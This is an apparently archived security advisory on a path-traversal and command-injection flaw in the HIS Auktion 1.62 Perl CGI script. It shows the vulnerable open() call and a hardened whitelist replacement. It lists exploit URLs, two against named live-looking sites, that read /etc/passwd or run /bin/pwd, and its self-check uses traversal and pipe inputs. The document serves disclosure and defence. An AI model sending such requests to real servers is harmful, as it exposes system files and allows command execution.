COMMAND

    Auktion

SYSTEMS AFFECTED

    HIS Auktion 1.62

PROBLEM

    The following is based on UkR security team advisory #8.  "HIS
    Auktion 1.62" is a catalog-of-links CGI script.  The problem is in
    the readfile routine of auktion.pl:

        -------from auktion.pl-------
        sub readfile {
        local($filename)=$_[0];   # first argument: the "menue" CGI parameter, passed in unchanged
        local(@array);
        open(f,$filename);        # two-argument open: no path check, and a name ending in "|" is run as a command
        ----------------------------

    $filename is not filtered for metacharacters.  Because open() is called
    with two arguments, Perl interprets the value: ".." sequences walk out
    of the script's directory and read any file the web server account can
    open, and a value ending in "|" is executed as a shell command (the
    "command" URLs below only run something if the value ends in "|").
    Exploit:

        http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
        http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
        http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd

SOLUTION

    To fix the bug you need to add a check of the variable $filename to
    the script.  The original advisory suggests escaping shell
    metacharacters.  As printed there the pattern is a parenthesised
    literal string (it matches only the exact sequence "[];:/$!$&`\(){}\""
    and so never fires); written as a character class it reads:

        $filename=~s/([\[\]\;\:\/\$\!\&\`\\\(\)\{\}\"])/\\$1/g;

    Even then this blacklist is weak: "|" and ".." are not in it, so the
    two-argument open() can still be turned into a command pipe, and when
    Perl hands a string such as "..\/..\/bin\/pwd|" to /bin/sh the shell
    removes the backslashes again.  The safer fix is to accept only a
    plain file name (letters, digits, "_", "-" and one extension), join it
    to a fixed directory and open it with the three-argument
    open($fh, '<', $path), so the value can never be read as a path or a
    command.
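
    As an added example (this is not code from HIS Auktion and not the
    escaping fix proposed in the original advisory), the following is a
    hardened readfile() written for this page.  It applies a whitelist to
    the "menue" value, joins it to a fixed directory and uses a
    three-argument open().  The directory path and the menu file name used
    in the self-check are assumptions.

```perl
#!/usr/bin/perl
# Added example, not code from HIS Auktion: a hardened replacement for
# readfile() that accepts only a plain menu file name and never lets the
# caller choose a path or a command.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);

# Assumption: all menu files live in one fixed directory.
our $MENU_DIR = '/usr/local/his/auktion/menues';

# Returns the file's lines, or an empty list (with a warning) if the name
# is not acceptable or the file cannot be opened.
sub readfile {
    my ($name) = @_;

    # Whitelist instead of a blacklist: a single path component, no "/",
    # no "..", no "|", no NUL byte, no leading "-" or ".".  The capture
    # also untaints the value when the script runs under perl -T.
    unless (defined $name
        && $name =~ /\A([A-Za-z0-9_][A-Za-z0-9_-]{0,63}(?:\.[A-Za-z0-9]{1,8})?)\z/) {
        warn "readfile: rejected menu name\n";
        return ();
    }
    my $path = File::Spec->catfile($MENU_DIR, $1);

    # Three-argument open with an explicit "<" mode: the name is data, so a
    # trailing "|" would be part of the file name, not a pipe to a command.
    open(my $fh, '<', $path) or do {
        warn "readfile: cannot open $path: $!\n";
        return ();
    };
    my @lines = <$fh>;
    close($fh);
    return @lines;
}

# Self-check against a constructed menu directory (assumed file name).
my $dir = tempdir(CLEANUP => 1);
{
    local $MENU_DIR = $dir;
    open(my $out, '>', "$dir/start.html") or die "cannot write test file: $!";
    print $out "<h1>menu</h1>\n";
    close($out);

    my @ok = readfile('start.html');
    print "good name: ", scalar(@ok), " line(s)\n";   # expected: 1

    # The same inputs the advisory's exploit URLs would send, plus a pipe
    # and an embedded NUL; all of them must be rejected before open().
    for my $bad ('../../../../../../etc/passwd', '/bin/pwd|',
                 "start.html\0x", 'ls|') {
        (my $shown = $bad) =~ s/\0/\\0/g;
        my @got = readfile($bad);
        print "rejected: $shown\n" unless @got;
    }
}
```

    The check is a whitelist on purpose: with the rejected characters
    enumerated, every new trick (NUL bytes, a trailing "|", "..") has to
    be added to the list, whereas a pattern that only admits one simple
    file name stays correct no matter what Perl's open() is willing to
    interpret.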